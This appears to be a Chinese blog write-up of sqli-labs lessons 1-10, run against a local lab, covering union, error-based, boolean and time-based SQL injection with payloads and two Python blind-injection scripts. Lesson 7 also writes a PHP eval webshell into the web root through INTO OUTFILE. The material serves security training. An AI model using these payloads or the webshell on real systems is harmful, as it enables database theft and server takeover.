2. 程式人生 > 實用技巧 >Sqli-labs 1-10

Sqli-labs 1-10

阿新 發佈:2020-09-04

Less 1-4(基礎注入)

基礎知識:

  • table_schema:資料庫的名稱
  • table_name:表的名稱
  • column_name:列的名稱
  • information_schema:表示所有資訊,包括庫、表、列
  • information_schema.tables:表示所有表的資訊
  • information_schema.columns:表示所有列的資訊
  • limit 0,1 :從第0位(第一個)開始搜尋1個
  • group_concat:將結果聯合在一行輸出

查庫

  • select 1,2,group_concat(schema_name) from information_schema.schemata

Payload

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

selete 1,2是因為發現有三個輸出位置,第一個沒有結果,需要爆的的位置在2,3均可。

不一定一定是'閉合,不同題還可能是",)等等。

最後的+會被解析成空格,如果沒有+,註釋符號--會和'再一起導致報錯。

查表

  • select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

Payload

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

查列

  • select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

payload

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

查欄位

  • select 1,2,group_concat(username,0x3a,password) from security.users

0x3a 16進位制轉10進位制就是58 轉字元就是;

payload與前面類似

Less 5-6(報錯注入)

  1. floor報錯

    • 1'後+ or (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

  2. extractvalue報錯

    • 1'後+or extractvalue(1, concat(1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) --+
    • 上面是查表,其他的類似更改就行。
    • 結果只能一個一個顯示,故是limit x,1。要逐個查詢則更改x的值。

Less 7 (匯入檔案注入)

  • 一點補充,不同軟體及系統下網站根目錄:

linux:/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm

apache:.../var/www/htm,.../var/www/html/htdocs

phpstudy(我就是這個):...\PHPTutorial\WWW\

那麼該怎麼獲取到呢,這個板塊我們無法拿到,可以在之前Less 1試試

payload:?id=-1' union select 1,@@basedir,@@datadir --+

成功拿到了地址

現在回到Less 7

payload:?id=1')) union select 1,2,'<?php @eval($_POST["theoyu"]);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php" --+

發現並沒能傳入檔案..

百度得知需要檢視mysql有無寫入許可權:

  • 開啟mysql 輸入show variables like '%secure%';

  • 這裡是我已經更改過的,沒有更改的secure_file_priv這裡value應該是NULL,需要開啟mysql.ini加入secure_file_priv="/"

  • 然後就是上面我的樣子了!就可以傳檔案了。

  • 之後就可以用蟻劍或者菜刀為所欲為了~

Less 8(布林注入)

payload:?id=1' and (select length(database())=1) --+

這裡不斷更改1,2直到8,根據頁面是否返回you are in......判斷正確與否,這裡用python指令碼嘗試爆破資料庫長度和名字。

import requests
import re
import datetime

target_url='http://localhost/sqli-labs-master/Less-8/'

'''Get database length'''
def get_database_length(target_url):
    print('Loading...')
    for i in range(1,10):
        payload = "?id=1' and (select length(database())=%s) --+"%i
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........",htmlcontent)
        if not result:
            continue
        else:
            print('Database length: %s' %i)
            return i

'''Get database name'''
def get_database_name(target_url):
    db_name = ''
    db_length = get_database_length(target_url)
    letters = 'abcdefghijklmnopqrstuvwxyz'
    for i in range(1,db_length + 1):
        for letter in letters:
            payload = "?id=1' and substr(database(),%s,1)='%s' --+" %(i, letter)
            r = requests.get(target_url + payload)
            if 'You are in' in r.text:
                db_name += letter
                print(db_name)
                break
           
    print('Database name:%s'%db_name)
    return db_name

if __name__ == '__main__':
    print('+---------------------------------------------------------------------------------------------+')
    begin = datetime.datetime.now()
    target_url = 'http://127.0.0.1/sqli-labs-master/Less-8/'
    database = get_database_name(target_url)
    
    print('+---------------------------------------------------------------------------------------------+')

結果如下:

也不知道為什麼,速度真的很慢很慢很慢??平均每個字母嘗試都畫了一秒,一個位元組就畫了快一分鐘(還是我沒把數字包含進去),看視訊裡都是刷瞬間就弄完了,尋思我的電腦也沒那麼爛阿?

哦對了不想用python的話用burp suite也可以,很簡單速度好像還快一些。

Less 9-10 (基於時間的盲注)

  • 在這兩個模組,無論我們輸入什麼,返回的結果都是一樣的,只能用sleep函式,根據返回的時間進行判斷。
import requests 
import datetime
import time 
global length


def database_len():
    for i in range(1,10):
        url='''http://localhost/sqli-labs-master/Less-9/'''
        payload='''?id=1' and if(length(database())=%d,sleep(3),0) --+'''%i
        start_time=time.time()
        requests.get(url+payload)
        if time.time()-start_time>3:
            print('database length is ',i)
            global length
            length=i
            break
        else:
            print(i)
database_len()

def database_name():
    name=''
    for j in range(1,length+1):
        for i in 'abcdefghijklmnopqrstuvwxyz0123456789':
            url='''http://localhost/sqli-labs-master/Less-9/'''
            payload='''?id=1' and if(substr(database(),%d,1)='%s',sleep(3),0)--+'''%(j,i)
            start_time=time.time()
            requests.get(url+payload)
            if time.time()-start_time>3:
                name+=i
                print(name)
                break
    print('database_name:',name)

database_name()
  • 輸出結果

相關推薦

Sqli-labs 1-10

Less 1-4(基礎注入) 基礎知識: table_schema:資料庫的名稱 table_name:表的名稱 column_name:列的名稱

sqli-labs less1-10詳解

文章目錄 第一關,基於錯誤的GET單引號字元型注入 字串連線函式: concat(str1,str2) //沒有分隔符的連線字串 concat_ws(str,str2) //含有分隔符的連線字串 group_concat(str1,str2) //連線一個組的

sqli-labs-1

開啟網站 存在引數id測試注入點 判斷什麼型別注入 使用3-2數學表示式測試為字元型、結果顯示的是id=3的結果,如果是數字型結果應該為id=1的結果

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

sqli labs(Less-1至Less-10

網安興趣愛好者,初次分享學習筆記。 Less-1 型別 字元型回顯注入\' 輸入點 根據新增\'頁面的回顯,可以判斷出\'是閉合

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

sqli-labs關卡1-15

less-1 目標url:http://fgxljj.icu:88/Less-1/   (1) 判斷注入點 輸入單引號,頁面報錯(語法錯誤,說明輸入的單引號被帶入到資料庫並執行了)

Sqli-labs1-4)

目錄 前言 此關卡的主要思想以及步驟如下: 首先判斷注入方式 less-1 提示為字元型注入,構造payload ../?id=1\' and 1=1正確 ../?id=1\' and 1=2錯誤確認存在注入點

less-10 in sqli-labs

Less-10 延遲注入[ ” ] 先進行注入點的測試,發現試過很多回顯都是一樣的,當嘗試到?id=1\" and sleep(5) --+,發現頁面在遲緩後有回顯,猜測是基於\"的時間盲注,盲註腳本和less-9基本一樣,改下url就行。

1. sqli-labs學習 less-01

0x00 過程 新增id引數,回寫正常 payload:http://127.0.0.1/sqli_labs/Less-1/?id=1 尋找注入點

關於django 1.10 CSRF驗證失敗的解決方法

最近工作閒,沒事自學django,感覺這個最煩的就是各版本提供的api函式經常有變化,不是取消了就是引數沒有了,網上搜到的帖子也沒說明用的是什麼版本的django,所以經常出現搬運過來的程式碼解決不了問題的情況,不過

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

freeswitch官網最新版安裝1.10.3

1.系統版本查詢:我這裡安裝的是 debian9 root@qicheng:~# lsb_release -a No LSB modules are available.

sqli-labs 18-19 --Header_injection

sqli-labs 18 知識點 頭部注入 報錯注入 使用的函式: updatexml (XML_document, XPath_string, new_value);

sqli-labs 20-22 --cookie注入

異常處理 一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

一不小心git rebase後出現(master|REBASE 1/10)的問題及解決辦法

有時候在向伺服器git push origin master的時候會出現失敗的現象。它是這樣的 然後呢,我在百度上歷經千辛萬苦,找到了解決的方法。

[VC/Win32] WinXP/7/8/8.1/10修改檔案、登錄檔、程序令牌許可權,解除TrustedInstaller許可權限制

Win7/8/8.1/10系統登錄檔和C盤裡的檔案大多有TrustedInstaller許可權限制,我們不能直接修改,必須要修改許可權才行,下面是通過程式設計的方法修改的效果: